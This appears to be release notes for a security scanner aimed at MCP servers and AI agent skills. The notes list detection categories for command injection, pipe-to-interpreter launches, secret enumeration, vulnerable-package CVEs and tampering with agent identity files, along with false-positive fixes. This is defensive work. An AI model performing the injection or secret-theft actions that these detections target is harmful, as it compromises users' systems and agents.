Threat-coverage refresh aligned with the 2026 MCP and agent-skill disclosure wave, plus a false-positive sweep against the top-50 MCP ecosystem.
New detections
- CMCP-005 MCP launch-command injection (shell wrappers, pipe-to-interpreter, chained operators). Covers the OX Security STDIO RCE class.
- CMCP-006 known-vulnerable MCP package denylist, version-aware (NVD-verified: CVE-2025-49596, CVE-2026-41497, CVE-2026-5059).
- Base64/hex encoded-secret decoding in the credential scanner.
- Agent identity-file write detection (MEMORY.md, AGENTS.md, SOUL.md) per OWASP Agentic Skills AST04.
- JS/TS dangerous patterns in the skill scanner (eval/Function, child_process, dynamic require, process.env enumeration).
Scanner updates
- OpenAI
sk-admin-keys; GoogleAIzakeys raised to CRITICAL (Gemini access since Feb 2026).
False-positive fixes (top-50 ecosystem scan: critical 17 -> 1, high 15 -> 3)
- Fixture/snapshot dirs, bare tests.rs/test.rs, and secrets inside test functions are treated as test context.
- Secret-scanner allowlist configs (.gitguardian.yaml, .gitleaks.toml, ...) recognized as example context.
- Self-describing kebab/snake placeholder keys suppressed.
- Loopback connection/basic-auth strings treated as dev scaffolding.
- JS/TS child_process calibrated to MEDIUM; identity-file code-exec check requires call syntax.
Hardening
- Connection-string regex rewritten to remove a ReDoS risk; four broad exception handlers narrowed to log instead of swallow.
Full details in CHANGELOG.md. 653 tests passing.